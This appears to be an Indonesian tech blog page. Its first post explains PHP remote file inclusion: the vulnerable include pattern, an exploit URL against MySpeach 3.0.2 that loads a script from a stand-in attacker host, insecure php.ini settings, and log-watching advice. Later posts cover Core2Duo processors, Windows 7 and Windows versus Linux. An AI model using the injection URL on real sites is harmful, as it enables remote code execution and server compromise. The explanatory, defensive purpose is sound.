Laman

Jumat, 18 Maret 2011

PHP INJECTION

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses file inclusion (yang selanjutnya kita sebut dengan istilah ‘injeksi’) bisa terjadi dalam bahasa PHP.

° BAGAIMANA BISA TERJADI?
———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. “/file…”)
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel seperti ini:


include($my_ms[”root”].’/error.php’);


Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
-------------

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, etc..)
5. Dan banyak lagi...!!! Termasuk tindakan pengambilalihan server dan ddos!

° SISTEM OPERASI APA YANG KEBAL?
------------------------------

Saya teringat permainan C&C Generals (my fave game!) saat seorang hacker keluar dari barak. Mereka mengucapkan "NO SYSTEMS IS SAFE!". Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi selama mereka menggunakan server side scripting yang dapat dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX, FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
-------------------------

Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING
------

Artikel ini saya tulis berdasarkan apa yang saya ketahui, dan jika terdapat kesalahan karena ketidaktahuan saya anda dapat menghubungi saya lewat email. Pengalaman adalah guru yang terbaik untuk kita semua. Semua bisa saja terjadi karena tidak ada pribadi yang diciptakan sempurna. Nobody is perfect! No systems is safe!

Read More..

Core2Duo mobile

Untuk Core2Duo mobile, terdapat beberapa generasi.
Generasi pertama memiliki code name Merom. Ditandai dengan seri prosesor
T5×00 yang memiliki L2Cache 2MB, bus antara 533 atau 667Mhz; atau T7×00 yang
memiliki L2Cache 4MB dan bus sebesar 667Mhz.
Generasi kedua memiliki codename Merom 2M (T7×50) yang diluncurkan
pada awal 2007 dan memiliki L2 cache sebesar 2MB dengan FSB sebesar 667MHz
(kecuali T5470 yang berFSB 800Mhz).
Generasi ketiga memiliki codename SantaRosa (T7×00) yang diluncurkan
pada May 2007, dengan ciri-ciri memiliki FSB sebesar 800Mhz.
Generasi berikutnya, disebut penryn. Prosesor mobile intel dengan arsitektur
45nm. Bus antara 800Mhz (seri T8×00, T9×00, SU9×00) dan 1066Mhz (SL9×00 dan
SP9×00 series). L2 cache antara 3MB atau 6MB.
Pentium Dual Core. Pada tahun 2007, intel kembali menggunakan nama
“pentium” untuk membangkitkan pasar yang lemah. Pentium Dual core dibagi 2,
untuk notebook dan untuk desktop. Pentium dualcore untuk notebook sebenarnya
adalah Intel Core Duo (Yonah) yang dipotong L2 cachenya manjadi 1MB dan
memakai FSB 533MHz. (cek list here). Sedangkan pentium dualcore untuk Desktop
adalah Allendale yang dipotong L2 cachenya menjadi 1MB dan hanya memakai FSB
800MHz (serinya E2xxx).
Kesimpulan :
Pentium Dualcore hanya produk lama yang dikurangi performanya untuk
menurunkan harga jual
• Dual Core, adalah tipe prosesor Core Duo yang dikurangi jumlah L2 cachenya.
Hal ini dilakukan untuk memperoleh harga prosesor yang lebih murah,
untuk menyaingi prosesor AMD X2.
• Sementara Core2Duo adalah prosesor Core Duo yang dipersiapkan untuk
mensupport sistem operasi 64bit. Dengan L2 cache yang lebih besar

Read More..

Kelemahan Dan Kelebihan Windows 7

Kelebihan :
1. proses boot/shut down lebih cepat
2. konsumsi daya CPU, hard disk (HD) dan memori yang dibutuhkan system service lebih sedikit
3. Mengoptimisasi prefetching baik untuk HD maupun SSD
4. Tampilan Lebih bagus dari segi 3 demensinya yang menonjol
5. Fitur sekurity yang benar-benar ketat.

Kelemahan / Kekurangan :
1. Beberapa aplikasi belum bisa beroperasi di Windows 7
2. Bug pada Windows Player 12
3. Ada hardware yang bisa langsung dikenali di Vista, tapi tidak di Windows 7
4. Susah memaksa software yang sebelumnya bisa dipaksakan diinstall di Vista, juga dipasang di Windows 7

Namun karena yang muncul sekarang masih merupakan versi uji coba, sehingga masih terdapat banyak kekurangan. ”Tampilannya mendekati Windows Vista dan terlihat lebih hidup. Tetapi untuk secara keseluruhan memang belum bisa dinilai, karena versi finalnya belum keluar.

Read More..

Perbedaan Window dan Linux

Perbedaan pada User Interface



Di Windows, Anda tidak banyak memiliki pilihan user interface. Sebagai misal, di Windows 95/98 Anda hanya mengenal user interface bawaan Windows 95/98. Anda sedikit lebih beruntung jika menggunakan Windows XP, karena Anda bisa berpindah dari interface milik Windows XP ke Windows 98 yang lebih ringan.
Di Linux, Anda bisa menemukan banyak macam user interface. Dan biasanya pilihan user interface ini dapat Anda sesuaikan dengan spesifikasi komputer atau lingkungan kerja Anda. Sebagai misal, pada komputer yang lambat Anda bisa menggunakan user interface yang ringan, seperti XFCE atau Fluxbox.
Atau jika Anda menyukai gaya Mac, Anda bisa memilih desktop model GNOME atau menggunakan utility Docker. Dan jika Anda terbiasa di Windows dan memiliki komputer yang cukup cepat, Anda bisa memilih desktop KDE.
Dengan KDE, Anda masih bisa memilih untuk menggunakan gaya Windows XP ataupun Windows Vista. Pilihan dan variasinya sangat banyak di Linux, Anda bisa mengatur sesuai dengan favorit Anda.


Perbedaan pada Sekuriti dan Virus
Salah satu masalah utama di Windows yang paling sering Anda temukan adalah virus dan spyware. Dari tahun ke tahun permasalahan ini bukan semakin mengecil tetapi malah semakin membesar. Ini semua terjadi karena banyak lubang keamanan di Windows yang bisa dieksploitasi oleh orang-orang yang tidak bertanggungjawab.
Linux diturunkan dari sistem operasi Unix yang memiliki tingkat sekuriti lebih kuat. Itu sebabnya tidak ada banyak virus di Linux dan kalaupun ada tidak bisa berkembang biak dengan pesat dan biasanya tidak mampu membawa kerusakan yang besar.
Sekalipun tidak sepenting di Windows, Anda tetap bisa menemukan program-program anti virus di Linux, seperti ClamAV dan F-Prot. PCLinux telah menyediakan anti virus ClamAV yang bisa ditemukan pada menu Start > Applications > FileTools > KlamAV.

Spyware
Spyware adalah suatu masalah yang cukup umum di dunia Windows. Biasanya program spyware mengamati, mengumpulkan dan mengirimkan data Anda ke suatu server. Untuk hal yang lebih positif, program ini biasanya dipergunakan untuk keperluan marketing.
Sayangnya, ada juga yang berniat buruk yaitu dengan mencuri identitas, kartu kredit, dan tindakan negatif lainnya.
Tidak banyak program spyware yang menginfeksi Linux mengingat cara kerja Linux yang lebih susah untuk ditembus. PCLinux telah menyediakan pre-instal Firewall untuk melindungi sistem Anda dan bisa diaktifkan melalui PCLinux Control Panel.

Read More..